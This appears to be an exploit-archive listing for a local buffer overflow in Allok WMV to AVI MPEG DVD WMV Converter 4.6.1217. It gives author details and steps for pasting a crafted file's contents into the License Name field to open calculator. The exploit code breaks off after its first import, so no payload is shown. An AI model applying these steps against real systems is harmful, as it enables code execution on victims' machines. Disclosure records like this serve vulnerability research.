Allok wmv to avi mpeg dvd wmv converter 4.6.1217 buffer overflow Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2018-03-30 |
Type : local |
Platform : windows
This exploit / vulnerability Allok wmv to avi mpeg dvd wmv converter 4.6.1217 buffer overflow is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# SWAMI KARUPASAMI THUNAI
###############################################################################
# Exploit Title: Allok soft WMV to AVI MPEG DVD WMV Converter - Buffer Overflow Vulnerability (Windows XP SP3)
# Date: 06-03-2018
# Exploit Author: Mohan Ravichandran & Velayutham Selvaraj
# Organization : TwinTech Solutions (Talented Pentesters Hut)
# Vulnerable Software: Allok WMV to AVI MPEG DVD WMV Converter
# Vendor Homepage: http://www.alloksoft.com
# Version: 4.6.1217
# Software Link: http://www.alloksoft.com/wmv.htm
# Tested On: Windows XP Service Pack 3 (Version 2002)
#
# Credit to Velayutham Selvaraj for discovering the Vulnerbility
# Vulnerability Disclosure Date : 2018-03-06
#
# Manual steps to reproduce the vulnerability ...
#1. Download and install the setup file
#2. Run this exploit code via python 2.7
#3. A file "exploit.txt" will be created
#4. Copy the contents of the file and paste in the License Name field
# Name > exploit.txt
#5. Type some random character in License Code
#6. Click Register and voila !
#7. Boom calculator opens
#
##############################################################################
import struct